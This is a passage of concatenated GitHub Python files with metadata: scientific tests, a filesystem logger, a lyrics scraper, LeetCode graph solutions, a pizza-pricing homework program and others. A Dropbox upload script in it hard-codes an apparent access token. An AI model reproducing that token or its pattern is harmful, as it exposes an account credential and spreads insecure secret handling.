re.sub(r'\".*\"',\"\",character).strip().replace(' ',' ')\n\n else:\n return character\n\n\ndef get_text_within_quoted(character):\n\n if '“' in character:\n res = re.findall(r'\\“.*?\\”', character)\n\n if len(res) == 0:\n return character\n\n return res[0].replace('“','').replace('”','')\n\n if '\"' in character:\n res = re.findall(r'\\\".*?\\\"', character)\n\n if len(res) == 0:\n return character\n\n return res[0].replace('\"','')\n else:\n return character\n\ndef remove_middle_name(character):\n\n splits = character.split(' ')\n\n if len(splits) == 3:\n return ' '.join([character.split(' ')[0], character.split(' ')[-1]])\n\n return character\n\n\ndef get_last_three_words(character):\n\n splits = character.split(' ')\n \n if len(splits) > 2:\n return ' '.join(character.split(' ')[-2:])\n\n return character\n\ndef desc_comma(character):\n\n splits = character.split(', ')\n\n if len(splits) != 2:\n return character\n\n return splits[0], splits[-1]\n\ndef remove_lonely_brackets(variation):\n if '(' in variation and ')' not in variation:\n variation = variation.replace('(','')\n\n elif ')' in variation and '(' not in variation:\n variation = variation.replace(')','')\n\n return variation\n\n\ndef iterate_through_var_functions(character, variations, varFunctions = [remove_title, get_first_name, remove_mr, remove_first_name, get_last_three_words, remove_middle_name, remove_title_keep_first_name]):\n for function in varFunctions:\n\n if character != function(character):\n variations.append(function(character))\n\n\n if character != remove_title(character):\n for function in varFunctions:\n if remove_title(character) != function(remove_title(character)):\n variations.append(function(remove_title(character)))\n\n if character != desc_comma(character):\n variations += desc_comma(character)\n\n # get rid of commas / apostrophes; add to variations\n if character != character.replace(\"'\",' '):\n variations.append(character.replace(\"'\",' '))\n\n if character != character.replace('.',''):\n variations.append(character.replace('.',''))\n\n return variations\n\n\n# def get_canon_name_variations(character, varFunctions = [remove_apostrophe, ]):\n# character = character.strip()\n# variations = [character]\n\n# if remove_brackets(character) != character:\n# variations.append(get_text_from_within_brackets(character).replace('\"','').replace('“','').replace('”',''))\n# variations = iterate_through_var_functions(get_text_from_within_brackets(character), variations)\n# character = remove_brackets(character).strip()\n# if character == '':\n# return variations\n# variations.append(character)\n\n","repo_name":"grace-stoddart/character_extraction","sub_path":"src/eval_functions.py","file_name":"eval_functions.py","file_ext":"py","file_size_in_byte":13884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31298097443","text":"from pytest import approx\nimport MDAnalysis as mda\nfrom clustercode.ClusterEnsemble import ClusterEnsemble\nimport os\nimport copy\n\n# These files comprise the same trajectory but processed with different\n# gmx trjconv -pbc options (cluster, atom, whole and mol). The trajectory\n# includes a large single micelles, in parts split across multiple pbc.\n# It's a superset (of a trajectory) of the pbc_problematic labelled ones.\ntpr = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"topol_no_solv.tpr\")\natom = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"traj_atom.xtc\")\nmol = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"traj_mol.xtc\")\ncluster = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"traj_cluster.xtc\")\nwhole = os.path.join(\"clustercode\", \"tests\", \"cluster\", \"files\", \"traj_whole.xtc\")\n\n# The accompanying ClusterEnsemble objects\natom_uni = ClusterEnsemble(tpr, atom, [\"C1\", \"C2\", \"C3\", \"C4\"])\nmol_uni = ClusterEnsemble(tpr, mol, [\"C1\", \"C2\", \"C3\", \"C4\"])\nwhole_uni = ClusterEnsemble(tpr, whole, [\"C1\", \"C2\", \"C3\", \"C4\"])\nclstr_uni = ClusterEnsemble(tpr, cluster, [\"C1\", \"C2\", \"C3\", \"C4\"])\n\nwork_in = \"Residue\" # atom, Residue\nmeasure = \"b2b\" # b2b (bead to bead), COM, COG\npbc = True\n\nmol_uni.cluster_analysis(work_in=work_in, measure=measure, pbc=pbc)\nwhole_uni.cluster_analysis(work_in=work_in, measure=measure, pbc=pbc)\nclstr_uni.cluster_analysis(work_in=work_in, measure=measure, pbc=pbc)\natom_uni.cluster_analysis(work_in=work_in, measure=measure, pbc=pbc)\n\natom_list, whole_list, clstr_list, mol_list = [], [], [], []\n\n\ndef condens(uni, this_list, pbc):\n method = \"pkdtree\" # bruteforce, nsgrid, pkdtree\n for clusters in uni.cluster_list:\n for cluster in clusters:\n this_list.append(\n uni.condensed_ions(\n cluster, \"SU\", \"NA\", [4.4, 7.6], method=method, pbc=pbc\n )\n )\n\n\ncondens(atom_uni, atom_list, pbc)\ncondens(mol_uni, mol_list, pbc)\ncondens(whole_uni, whole_list, pbc)\ncondens(clstr_uni, clstr_list, pbc)\n\n\nclass TestCondensation:\n def run_condensed_ions(self, uni):\n \"\"\"\n Check if pkdtree, nsgrid and bruteforce algorithm in neighbour\n search (in condensed_ions) all get the same result for the mol_iven\n trajectory.\n \"\"\"\n results = []\n\n for method in [\"pkdtree\", \"nsgrid\", \"bruteforce\"]:\n ci = []\n for clusters in uni.cluster_list:\n for cluster in clusters:\n ci.append(\n uni.condensed_ions(\n cluster, \"SU\", \"NA\", [4.4, 7.6], method=method, pbc=pbc\n )\n )\n results.append(copy.deepcopy(ci))\n\n for ti, mol_i, bi in zip(*results):\n for tii, mol_ii, bii in zip(ti, mol_i, bi):\n assert tii == approx(mol_ii)\n assert tii == approx(bii)\n assert mol_ii == approx(bii)\n\n def test_atom_uni(self):\n self.run_condensed_ions(atom_uni)\n\n def test_mol_uni(self):\n self.run_condensed_ions(mol_uni)\n\n def test_whole_uni(self):\n self.run_condensed_ions(whole_uni)\n\n def test_cluster_uni(self):\n self.run_condensed_ions(clstr_uni)\n\n def check_cond1_cond2(self, cond_1, cond_2):\n for cond_1i, cond_2i in zip(cond_1, cond_2):\n for cond_1ii, cond_2ii in zip(cond_1i, cond_2i):\n assert cond_1ii == approx(cond_2ii, abs=1)\n\n def test_atom_mol_uni(self):\n \"\"\"\n Test if atom and mol treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(atom_list, mol_list)\n\n def test_atom_whole_uni(self):\n \"\"\"\n Test if atom and whole treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(atom_list, whole_list)\n\n def test_atom_clstr_uni(self):\n \"\"\"\n Test if atom and clstr treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(atom_list, clstr_list)\n\n def test_mol_whole_uni(self):\n \"\"\"\n Test if mol and whole treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(mol_list, whole_list)\n\n def test_mol_clstr_uni(self):\n \"\"\"\n Test if mol and clstr treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(mol_list, clstr_list)\n\n def test_whole_clstr_uni(self):\n \"\"\"\n Test if whole and clstr treated trajectories are within 1\n condensed ion\n \"\"\"\n self.check_cond1_cond2(whole_list, clstr_list)","repo_name":"MatKie/clustercode","sub_path":"clustercode/tests/cluster/test_clstr_condensation.py","file_name":"test_clstr_condensation.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8529614565","text":"# -*- coding: utf8 -*-\n\n__author__ = 'sergey'\n\nimport sys\nfrom time import time\nfrom dedupsqlfs.log import logging, DEBUG_VERBOSE, IMPORTANT\n\nclass DDSFlogger(object):\n \"\"\"\n Loggin class with ability to skip any logging work\n \"\"\"\n\n\n _app = None\n\n\n _time_in = 0\n\n\n _filter_calls = None\n\n\n _logger = None\n\n\n def __init__(self, application, filter_calls=None):\n \"\"\"\n @param application:\n @type application: dedupsqlfs.fuse.dedupfs.DedupFS\n\n @param filter_calls:\n @type filter_calls: list|tuple|set|None\n \"\"\"\n self._app = application\n self._filter_calls = set()\n if type(filter_calls) in (list, tuple, set,):\n self._filter_calls += set(filter_calls)\n self._init()\n pass\n\n\n def getTimeIn(self):\n return self._time_in\n\n\n def addCallToFilter(self, call):\n \"\"\"\n Add function name to log filter\n @param call:\n @return:\n \"\"\"\n self._filter_calls.add(call)\n\n\n def isEnabledFor(self, level):\n return self._logger.isEnabledFor(level)\n\n def getEffectiveLevel(self):\n return self._logger.getEffectiveLevel()\n\n def setLevel(self, level):\n return self._logger.setLevel(level)\n\n\n def _init(self):\n self._logger = logging.getLogger(self._app.__class__.__name__)\n self._logger.setLevel(logging.ERROR)\n\n # By default - almos all disabled\n self.critical = self._log_critical\n self.error = self._log_error\n self.important = self._log_important\n self.warning = self._empty_log\n self.warn = self._empty_log\n self.note = self._empty_log\n self.info = self._empty_log\n self.debug = self._empty_log\n self.debugv = self._empty_log\n\n self.logCall = self._empty_log_call\n\n if self._app.getOption('memory_usage'):\n self._logger.setLevel(IMPORTANT)\n\n # Configure logging of messages to a file.\n if self._app.getOption(\"log_file\"):\n handler = logging.StreamHandler(open(self._app.getOption(\"log_file\"), 'a'))\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n self._logger.addHandler(handler)\n if not self._app.getOption(\"log_file_only\"):\n self._logger.addHandler(logging.StreamHandler(sys.stderr))\n # Convert verbosity argument to logging level?\n if self._app.getOption(\"verbosity\") > 0:\n if self._app.getOption(\"verbosity\") >= 1:\n self._logger.setLevel(logging.WARNING)\n self.warning = self._log_warning\n self.warn = self._log_warning\n self.note = self._log_note\n\n if self._app.getOption(\"verbosity\") >= 2:\n self._logger.setLevel(logging.INFO)\n self.info = self._log_info\n\n if self._app.getOption(\"verbosity\") >= 3:\n self._logger.setLevel(logging.DEBUG)\n self.debug = self._log_debug\n\n if self._app.getOption(\"verbosity\") >= 4:\n self._logger.setLevel(DEBUG_VERBOSE)\n self.debugv = self._log_debugv\n self.logCall = self._log_call\n return\n\n\n def resetVerbosityByLogLevel(self):\n \"\"\"\n Needed by `do` command and sub-actions\n \"\"\"\n curLevel = self.getEffectiveLevel()\n\n # By default - almos all disabled\n self.critical = self._log_critical\n self.error = self._log_error\n self.important = self._log_important\n self.warning = self._empty_log\n self.warn = self._empty_log\n self.note = self._empty_log\n self.info = self._empty_log\n self.debug = self._empty_log\n self.debugv = self._empty_log\n\n self.logCall = self._empty_log_call\n\n if curLevel <= logging.WARNING:\n self.warning = self._log_warning\n self.warn = self._log_warning\n self.note = self._log_note\n\n if curLevel <= logging.INFO:\n self.info = self._log_info\n\n if curLevel <= logging.DEBUG:\n self.debug = self._log_debug\n\n if curLevel <= DEBUG_VERBOSE:\n self.debugv = self._log_debugv\n self.logCall = self._log_call\n\n return\n\n def _empty_log_call(self, func, msg, *args):\n return\n\n\n def _empty_log(self, msg, *args):\n return\n\n\n def _log_call(self, func, msg, *args):\n begin_t = time()\n if not self._filter_calls or func in self._filter_calls:\n self._logger.debugv(\"%s %s\" % (func, msg,), *args)\n self._time_in += time() - begin_t\n\n\n def _log_critical(self, msg, *args):\n begin_t = time()\n self._logger.critical(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_error(self, msg, *args):\n begin_t = time()\n self._logger.error(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_important(self, msg, *args):\n begin_t = time()\n self._logger.important(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_warning(self, msg, *args):\n begin_t = time()\n self._logger.warning(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_note(self, msg, *args):\n begin_t = time()\n self._logger.note(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_info(self, msg, *args):\n begin_t = time()\n self._logger.info(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_debug(self, msg, *args):\n begin_t = time()\n self._logger.debug(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n def _log_debugv(self, msg, *args):\n begin_t = time()\n self._logger.debugv(\"%s\" % msg, *args)\n self._time_in += time() - begin_t\n\n\n pass\n","repo_name":"sergey-dryabzhinsky/dedupsqlfs","sub_path":"dedupsqlfs/fuse/helpers/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"13555796104","text":"import argparse\nimport os\nimport sys\nsys.path.insert(0, '../../lib/dataset')\nfrom dataset import SmellsOnlyDataset, MetricsOnlyDataset, MetricsAndSmellsDataset\n\ndef create(directory): \n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef check_type(value):\n ivalue = int(value)\n if ivalue < 0 or ivalue >= 3:\n raise argparse.ArgumentTypeError(\"%s is an invalid int value:\\n 0 - type smells\\n 1 - type metrics\\n 2 - type smells and metrics\" % value)\n return ivalue\n\ndef get_arguments():\n parser = argparse.ArgumentParser(description=\"Smell-based Defect Prediction. Process Dataset.\")\n parser.add_argument('-t','--type', required = True, type = check_type, help=\"Type of dataset: 0 --- Metrics Only; 1 --- Smells Only; 2 --- Metrics and Smells.\")\n parser.add_argument('-d','--dataset', required = True, help=\"Path to the dataset.\") \n return vars(parser.parse_args())\n\ndef main(out_dir):\n arguments = get_arguments()\n if(arguments['type'] == 0):\n dataset = MetricsOnlyDataset(arguments['dataset'])\n out_dir = out_dir + \"metrics-only-dataset/\"\n elif(arguments['type'] == 1):\n dataset = SmellsOnlyDataset(arguments['dataset'])\n out_dir = out_dir + \"smells-only-dataset/\"\n elif(arguments['type'] == 2):\n dataset = MetricsAndSmellsDataset(arguments['dataset'])\n out_dir = out_dir + \"metrics-and-smells-dataset/\"\n else:\n raise ValueError(\"The type must be either 0, 1 or 2\")\n \n create(out_dir)\n print(\"Saving Train X\")\n dataset.get_train_x().to_csv(out_dir + \"train_x.csv\")\n\n print(\"Saving Test X\")\n dataset.get_test_x().to_csv(out_dir + \"test_x.csv\")\n \n print(\"Saving Train Y\")\n dataset.get_train_y().to_csv(out_dir + \"train_y.csv\")\n\n\n print(\"Saving Tests Y\")\n dataset.get_test_y().to_csv(out_dir + \"test_y.csv\")\n \n\nif __name__ == '__main__':\n out_dir = \"../out/\"\n create(out_dir)\n main(out_dir)\n\n","repo_name":"Bruno81930/extreme-imbalanced-sbdf","sub_path":"dataset-processing/dataset-preparation/bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1984024046","text":"import dropbox\r\nimport os\r\nclass TransferData:\r\n def __init__(self, access_token):\r\n self.access_token = access_token\r\n\r\n def upload_file(self, file_from, file_to):\r\n dbx = dropbox.Dropbox(self.access_token)\r\n\r\n with open(file_from, 'rb') as f:\r\n dbx.files_upload(f.read(), file_to)\r\n os.path.realpath(file_from)\r\n os.path.join(file_to)\r\n\r\ndef main():\r\n access_token = 'ItXP46HeAkQAAAAAAAAAARzMVfUixr3dVBISJV_YdOsqpPbJbCosjrlhH2gasLfJ'\r\n transferData = TransferData(access_token)\r\n\r\n file_from = input(\"Enter File Path on PC : \")\r\n file_to = input(\"ENter File Path in Dropbox : \")\r\n\r\n transferData.upload_file(file_from, file_to)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"WolfBaneYT/incompleteDropboxBackup","sub_path":"uploadFiles.py","file_name":"uploadFiles.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23943215112","text":"import xml.etree.ElementTree as ET\n\nfrom .xml_obj import XmlObj\n\n\nclass Syllable(XmlObj):\n\n def __init__(self):\n self.m_phone_list = []\n self.m_tone = None\n self.m_language = None\n self.m_breaklevel = None\n\n def pronunciation_text(self):\n return ' '.join([str(phone) for phone in self.m_phone_list])\n\n def phone_count(self):\n return len(self.m_phone_list)\n\n def tone_text(self):\n return str(self.m_tone.value)\n\n def save(self):\n pass\n\n def load(self):\n pass\n\n def get_phone_meta(self,\n phone_name,\n word_pos,\n syll_pos,\n tone_text,\n single_syllable_word=False):\n # Special case: word with single syllable, the last phone's word_pos should be \"word_end\"\n if word_pos == 'word_begin' and syll_pos == 's_end' and single_syllable_word:\n word_pos = 'word_end'\n elif word_pos == 'word_begin' and syll_pos not in [\n 's_begin',\n 's_both',\n ]: # FIXME: keep accord with Engine logic\n word_pos = 'word_middle'\n elif word_pos == 'word_end' and syll_pos not in ['s_end', 's_both']:\n word_pos = 'word_middle'\n else:\n pass\n\n return '{{{}$tone{}${}${}}}'.format(phone_name, tone_text, syll_pos,\n word_pos)\n\n def save_metafile(self, word_pos, single_syllable_word=False):\n syllable_phone_cnt = len(self.m_phone_list)\n\n meta_line_list = []\n\n for idx, phone in enumerate(self.m_phone_list):\n if syllable_phone_cnt == 1:\n syll_pos = 's_both'\n elif idx == 0:\n syll_pos = 's_begin'\n elif idx == len(self.m_phone_list) - 1:\n syll_pos = 's_end'\n else:\n syll_pos = 's_middle'\n meta_line_list.append(\n self.get_phone_meta(\n phone,\n word_pos,\n syll_pos,\n self.tone_text(),\n single_syllable_word=single_syllable_word,\n ))\n\n return ' '.join(meta_line_list)\n\n\nclass SyllableList(XmlObj):\n\n def __init__(self, syllables):\n self.m_syllable_list = syllables\n\n def __len__(self):\n return len(self.m_syllable_list)\n\n def __index__(self, index):\n return self.m_syllable_list[index]\n\n def pronunciation_text(self):\n return ' - '.join([\n syllable.pronunciation_text() for syllable in self.m_syllable_list\n ])\n\n def tone_text(self):\n return ''.join(\n [syllable.tone_text() for syllable in self.m_syllable_list])\n\n def save(self, parent_node):\n syllable_node = ET.SubElement(parent_node, 'syllable')\n syllable_node.set('syllcount', str(len(self.m_syllable_list)))\n\n phone_node = ET.SubElement(syllable_node, 'phone')\n phone_node.text = self.pronunciation_text()\n\n tone_node = ET.SubElement(syllable_node, 'tone')\n tone_node.text = self.tone_text()\n\n return\n\n def load(self):\n pass\n","repo_name":"open-models-platform/open.models.llm-rlhf","sub_path":"modelscope/modelscope/models/audio/tts/kantts/preprocess/script_convertor/core/syllable.py","file_name":"syllable.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"73323754705","text":"import re, requests\nfrom bs4 import BeautifulSoup\n\ndef wikicase(s):\n\t\"\"\"Return a string in LyricWiki case.\n\tSubstitutions are performed as described at\n\t.\n\tEssentially that means capitalizing every word and substituting certain\n\tcharacters.\"\"\"\n\n\twords = s.split()\n\tnewwords = []\n\tfor word in words:\n\t\tnewwords.append(word[0].capitalize() + word[1:])\n\ts = \"_\".join(newwords)\n\ts = s.replace(\"<\", \"Less_Than\")\n\ts = s.replace(\">\", \"Greater_Than\")\n\ts = s.replace(\"#\", \"Number_\")\n\ts = s.replace(\"[\", \"(\")\n\ts = s.replace(\"]\", \")\")\n\ts = s.replace(\"{\", \"(\")\n\ts = s.replace(\"}\", \")\")\n\n\ts = s.replace(\"!\", \"\")\n\treturn s\n\ndef getlyrics(artist, title):\n\n\tbase = \"http://lyrics.wikia.com/\"\n\tpage = artist + ':' + title\n\n\tsoup = BeautifulSoup(requests.get(base + page).text)\n\ttry:\n\t\trawLyrics = soup.select(\".lyricbox\")[0]\n\texcept IndexError:\n\t\treturn \"\" #no lyrics to be found\n\n#\timport pdb; pdb.set_trace()\n\tlyrics = \"\"\n\tfor thing in rawLyrics.contents:\n\t\tif isinstance(thing, unicode) and '[' not in thing and 'p>' not in thing:\n\t\t\tlyrics += thing + \" \"\n\treturn lyrics.strip()\n","repo_name":"itsmeolivia/billboardtop100WORDS","sub_path":"lyrics/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73264480466","text":"import cv2\nimport numpy as np\nimport face_recognition\n\nimgSin = face_recognition.load_image_file('picture/sinmina1.jpg')\nimgSin = cv2.cvtColor(imgSin, cv2.COLOR_BGR2RGB)\nimgTest = face_recognition.load_image_file('picture/sinmina2.jpg')\nimgTest = cv2.cvtColor(imgTest, cv2.COLOR_BGR2RGB)\n\nfaceTarget = face_recognition.face_locations(imgSin)[0]\nencodeSin = face_recognition.face_encodings(imgSin)[0]\ncv2.rectangle(imgSin, (faceTarget[3], faceTarget[0]), (faceTarget[1], faceTarget[2]), (255, 0, 255), 2)\n\ncv2.imshow('sinmina', imgSin)\ncv2.imshow('sinmina_test', imgTest)\ncv2.waitKey(0)\n","repo_name":"dgtalist/ChungAng","sub_path":"Day_4/04_face_rec_02.py","file_name":"04_face_rec_02.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7385635511","text":"# https://leetcode.cn/problems/longest-increasing-path-in-a-matrix/\n\nfrom collections import deque\nfrom typing import List\n\n\nclass Solution_BFS:\n def __init__(self):\n self.deg = []\n self.dist = []\n self.to = []\n self.m = 0\n self.n = 0\n self.dx = [-1, 0, 0, 1]\n self.dy = [0, -1, 1, 0]\n self.q = deque()\n\n def longestIncreasingPath(self, matrix: List[List[int]]) -> int:\n\n self.m = len(matrix)\n self.n = len(matrix[0])\n self.to = [[] for _ in range(self.m * self.n)]\n self.deg = [0 for _ in range(self.m * self.n)]\n self.dist = [0 for _ in range(self.m * self.n)]\n for i in range(self.m):\n for j in range(self.n):\n for k in range(4):\n nx = i + self.dx[k]\n ny = j + self.dy[k]\n if nx < 0 or nx >= self.m or ny < 0 or ny >= self.n:\n continue\n if matrix[nx][ny] > matrix[i][j]:\n self.add_edge(self.num(i, j), self.num(nx, ny))\n\n for i in range(self.m * self.n):\n if self.deg[i] == 0:\n self.q.append(i)\n self.dist[i] = 1\n while self.q:\n x = self.q.popleft()\n for y in self.to[x]:\n self.deg[y] -= 1\n self.dist[y] = max(self.dist[y], self.dist[x] + 1)\n if self.deg[y] == 0:\n self.q.append(y)\n ans = 0\n for i in range(self.m * self.n):\n ans = max(ans, self.dist[i])\n return ans\n\n def num(self, i, j):\n return i * self.n + j\n\n def add_edge(self, u, v):\n self.deg[v] += 1\n self.to[u].append(v)\n\n\nclass Solution_DFS:\n\n def __init__(self):\n self.m = None\n self.n = None\n self.matrix = None\n self.dx = None\n self.dy = None\n self.dist = None\n\n def longestIncreasingPath(self, matrix: List[List[int]]) -> int:\n self.m = len(matrix)\n self.n = len(matrix[0])\n self.matrix = matrix\n self.dist = [[0 for _ in range(self.n)] for _ in range(self.m)]\n self.dx = [-1, 0, 0, 1]\n self.dy = [0, -1, 1, 0]\n ans = 0\n for i in range(self.m):\n for j in range(self.n):\n ans = max(ans, self.dfs(i, j))\n return ans\n\n def dfs(self, x, y) -> int:\n if self.dist[x][y] != 0:\n return self.dist[x][y]\n self.dist[x][y] = 1\n for i in range(4):\n nx = x + self.dx[i]\n ny = y + self.dy[i]\n if nx < 0 or nx >= self.m or ny < 0 or ny >= self.n:\n continue\n if self.matrix[nx][ny] > self.matrix[x][y]:\n self.dist[x][y] = max(self.dist[x][y], self.dfs(nx, ny) + 1)\n return self.dist[x][y]\n","repo_name":"ChenBingwei/Algorithm_geekbang_fifth","sub_path":"week05/example/ltc329_longest_increasing_path_in_a_matrix.py","file_name":"ltc329_longest_increasing_path_in_a_matrix.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13119139312","text":"#Andrew Barton: CSC 110 Wk 5 Homework - 10/25/18\r\n#Pete's pizza palace program takes user input form the size of the pizza and how\r\n#many pizza's wanted. The program will calculate the total price with current\r\n#deal going on and sales tax at 10.1%\r\n\r\n#Global Constants\r\nSALESTAX = .101\r\nDISCOUNT = .10\r\nSMALL = 8.99\r\nMEDIUM = 14.99\r\nMED_SECOND = 7.99\r\nLARGE = 24.99\r\n\r\n#Ask user for Size of the pizza and how many, based on size send to appropriate\r\n#function to perform calculations. Functions will return price and send to Taxes\r\ndef main():\r\n print(\"Welcome to Pete's Pizza Palace\")\r\n print(\"Please enter the size you would like\")\r\n \r\n size = input(\"'s' for Small, 'm' for Medium, or 'l' for Large: \")\r\n size = size.upper()\r\n \r\n #test for correct pizza size\r\n if size == 'S' or size == 'M' or size == 'L':\r\n \r\n quantity = int(input(\"How many Pizza(s) would you like to order: \"))\r\n\r\n #this case will prevent a invalid number from being calculated \r\n if quantity < 1:\r\n print(\"You have entered an invalid number. Please try again\")\r\n \r\n elif size == 'L':\r\n pizzaCost = large(quantity)\r\n taxCost = tax(pizzaCost)\r\n total = pizzaCost + taxCost\r\n return printOutput(\"Large\", quantity, pizzaCost, taxCost, total)\r\n\r\n elif size == 'M':\r\n pizzaCost = medium(quantity)\r\n taxCost = tax(pizzaCost)\r\n total = pizzaCost + taxCost\r\n return printOutput(\"Medium\", quantity, pizzaCost, taxCost, total)\r\n\r\n elif size == 'S':\r\n pizzaCost = large(quantity)\r\n taxCost = tax(pizzaCost)\r\n total = pizzaCost + taxCost\r\n return printOutput(\"Small\", quantity, pizzaCost, taxCost, total)\r\n\r\n else:\r\n print(\"You entered an invalid size, please restart and try again\")\r\n\r\n#This function will take in how many Large pizza's the user wants and calculates\r\n#the price without tax. If user wants more then 3 pizza's apply a 10% discount\r\ndef large(amount):\r\n sub_total = amount * LARGE\r\n if amount >= 3:\r\n discount = sub_total * DISCOUNT\r\n total = sub_total - discount\r\n return total\r\n else:\r\n return sub_total\r\n\r\n#calculate the price for medium size pizzas with a 'buy 1 get 2nd half off' deal\r\ndef medium(amount):\r\n twoPizzaCal = amount // 2\r\n fullPricePizza = twoPizzaCal * MEDIUM\r\n halfPricePizza = twoPizzaCal * MED_SECOND\r\n #if there is an odd number of pizza's we will calculate the extra here\r\n extraPizzaCal = amount % 2\r\n extraPizzaPrice = extraPizzaCal * MEDIUM\r\n sub_total = fullPricePizza + halfPricePizza + extraPizzaPrice\r\n return sub_total\r\n \r\n#small pizza's don't have a deal going on, just calculate and return\r\ndef small(amount):\r\n sub_total = amount * SMALL\r\n return sub_total\r\n\r\n#This calculate the sales tax but doesn't add it to the price\r\ndef tax(price):\r\n return price * SALESTAX\r\n\r\n#This funtion deals only with output\r\ndef printOutput(size, amount, price, taxes, total):\r\n price = '{:.2f}'.format(price)\r\n taxes = '{:.2f}'.format(taxes)\r\n total = '{:.2f}'.format(total)\r\n print(\"You asked for \" + str(amount) + \" \" + size + \" Pizza(s)\")\r\n print(\"Sub Total: $\" + str(price))\r\n print(\"Taxes: $\" + str(taxes))\r\n print(\"Total: $\" + str(total))\r\n\r\nmain()\r\n\r\n#TEST 1: Size 'l'; Quantity 5; subtotal 112.45; taxes 11.36; total 123.81\r\n#TEST 2: Size 'M'; Quantity 7; subtotal 83.93; taxes 8.48; total 92.41\r\n#TEST 3: Size 'S'; Quantity -4; Error message\r\n#TEST 4: Size 'w'; Error message\r\n\r\n#started this assignment writing the function names first, then started to\r\n#define main() with input for a large pizza, then wrote the function to handle\r\n#the large pizza calculations. Once large was good i copied the format for the\r\n#next two sizes.For a short while I got stuck with the 'else' statement always\r\n#printing at the end with an 'if' statement but I read up on the 'elif' and went\r\n#with that and it worked out great.\r\n\r\n#I tested the cases above on paper then sent them through the program to make\r\n#sure my algorithm was correct. Everything worked out well, I think the next\r\n#step I should fix is testing for 'null' in case the user doesn't enter anything\r\n\r\n#I learned that the 'elif' is very important for the correct flow of the program\r\n#when dealing with mulitple logic cases. I think next time I would also print\r\n#the amount you saved from the deals going on like \"You saved: $xx.xx\"\r\n","repo_name":"local80forlife/CollegeClasses","sub_path":"Barton_wk5 Homework.py","file_name":"Barton_wk5 Homework.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22216388443","text":"from bokeh.layouts import row, column\n\nfrom config.global_config import Res, Prod\nfrom grpc_clients import admin_page\nfrom host_figures import TransactionTable, ProductionTable, ButtonComponent, \\\n TextBoxComponent\nfrom bokeh.models.widgets import Button, Div\n\nclass UI:\n def __init__(self, portno):\n self.portno = portno\n self.transaction_table = TransactionTable()\n self.production_table = ProductionTable()\n self.time_box = self._build_time_box()\n self.next_turn_button = self._build_next_turn()\n self.refresh_button = self._build_refresh()\n self.ping_button = self._build_ping()\n self.label_row = self._labels_row()\n self.layout = self.plot()\n\n def _build_next_turn(self):\n specs = dict()\n specs['text'] = \"Next Turn\"\n specs['width'] = 70\n specs['height'] = 30\n button = ButtonComponent(specs, self.widget_callback)\n return button\n\n def _build_ping(self):\n specs = dict()\n specs['text'] = \"Ping\"\n specs['width'] = 70\n specs['height'] = 30\n button = ButtonComponent(specs, self.ping_callback)\n return button\n\n def _build_refresh(self):\n specs = dict()\n specs['text'] = \"Refresh\"\n specs['width'] = 70\n specs['height'] = 30\n button = ButtonComponent(specs, self.get_calls)\n return button\n\n def get_calls(self):\n print(f\"get_calls called with portno {self.portno}.\")\n for call in admin_page.getCall(self.portno):\n call = self._format_changes(call)\n self.figure_update(call)\n\n def _format_changes(self, request):\n output = dict()\n output['userid'] = request.userid\n for res in Res:\n tag = \"transaction_\" + res.name\n if res.name.upper() in request.buySell:\n output[tag] = request.buySell[res.name.upper()]\n else:\n output[tag] = 0\n for prod in Prod:\n tag = \"transaction_\" + prod.name\n if prod.name.upper() in request.buySell:\n output[tag] = request.buySell[prod.name.upper()]\n else:\n output[tag] = 0\n\n tag = \"production_\" + prod.name\n if prod.name.upper() in request.make:\n output[tag] = request.make[prod.name.upper()]\n else:\n output[tag] = 0\n return output\n\n def _build_time_box(self):\n specs = dict()\n specs['text'] = \"Time: 0\"\n specs['height'] = 20\n specs['width'] = 50\n return TextBoxComponent(specs)\n\n def figure_update(self, update):\n # self.time_box.widget.text = update['time']\n self.transaction_table.figure_update(update)\n self.production_table.figure_update(update)\n return True\n\n def 